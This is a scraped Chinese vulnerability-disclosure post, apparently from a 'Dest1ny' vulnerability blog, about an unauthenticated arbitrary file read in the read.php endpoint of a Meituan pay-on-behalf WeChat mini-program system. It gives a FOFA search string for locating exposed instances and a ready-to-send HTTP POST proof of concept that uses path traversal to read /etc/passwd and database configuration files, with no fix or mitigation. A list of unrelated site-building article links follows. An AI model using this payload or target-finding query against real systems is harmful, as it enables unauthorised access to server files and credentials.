当前位置: 首页 > wzjs >正文

济南浩特元辰建设工程有限公司网站成都开网站

济南浩特元辰建设工程有限公司网站,成都开网站,厦门正规的网站建设公司,网站备案文件吗大家好,今天是Dest1ny漏洞库的专题!! 会时不时发送新的漏洞资讯!! 大家多多关注,多多点赞!!! 0x01 产品简介 美团代付微信小程序系统是美团点评旗下的一款基于微信小程…

大家好,今天是Dest1ny漏洞库的专题!!

会时不时发送新的漏洞资讯!!

大家多多关注,多多点赞!!!


0x01 产品简介

美团代付微信小程序系统是美团点评旗下的一款基于微信小程序技术开发的应用程序功能之一,它允许用户方便快捷地请求他人为自己支付订单费用。随着移动支付的普及和微信小程序的广泛应用,美团作为中国领先的本地生活服务平台,推出了代付功能,以满足用户多样化的支付需求。通过微信小程序,用户可以轻松实现代付操作,无需跳转到其他应用或网页,提高了支付的便捷性和效率。前台支持购物车,个人中心,多选项等功能 ,后台支持推广,代理管理,菜品管理,积分明细,订单管理,模板,支付通道管理等功能。

0x02 漏洞概述

美团代付微信小程序系统 read.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:body="/h5/static/js/chunk-vendors.js"

0x04 漏洞复现

PoC

POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closename=../../../../../../../../../etc/passwd

读取数据库文件

 

 

http://www.dtcms.com/wzjs/590032.html

相关文章:

  • 网站需要服务器吗如何新建网页
  • 织梦网站后台如何做百度优化空白word个人简历模板下载
  • 企业建站 源码自己建设一个网站需要多少钱
  • 网站建设色彩个人网站 不用备案吗
  • 巩义建设网站wordpress页面显示摘要
  • 漳州城乡和建设局网站wordpress投稿设置
  • 顺德区网站设计建设企业广东新闻联播2011
  • 做淘宝客网站教程使用apmserv本地搭建多个网站
  • 做商城网站要什么手续费网页设计布局分析
  • 界面设计网站全网推广
  • 电脑做会计从业题目用什么网站百度商桥绑定网站
  • 关于建设网站的需求济南网站建设工作室
  • 洪涛怎么样海城市建设网站wordpress a标签加上nofollow
  • 合肥建设局网站黄村专业网站建设公司
  • wordpress学习 知乎aso优化排名
  • 校园网网站建设规划书小红书推广
  • 西北建设有限公司官方网站网站内容策略
  • 深圳有什么网站网站建设毕业报告
  • 发布 php 微网站性病医院网站优化服务商
  • 青岛市住房和城乡建设局官方网站武鸣住房和城乡规划建设局网站
  • 创客联盟网站建设软件程序定制开发
  • 如何网站切换google建站
  • 手机搭建网站教程甘肃公司的网络营销方案
  • 山西城乡和建设厅网站透明背景图片在线制作
  • 湛江建站服务wordpress新评论提醒
  • 网站设计的基本步骤和方法工业和信息化部发短信什么意思
  • 网站建设历史做网站 贴吧
  • 荣胜网络 宁波网站建设如何确定网站建设空间
  • 搭建网站成本网上做效果图
  • 一般做网站所使用的字体项目备案信息查询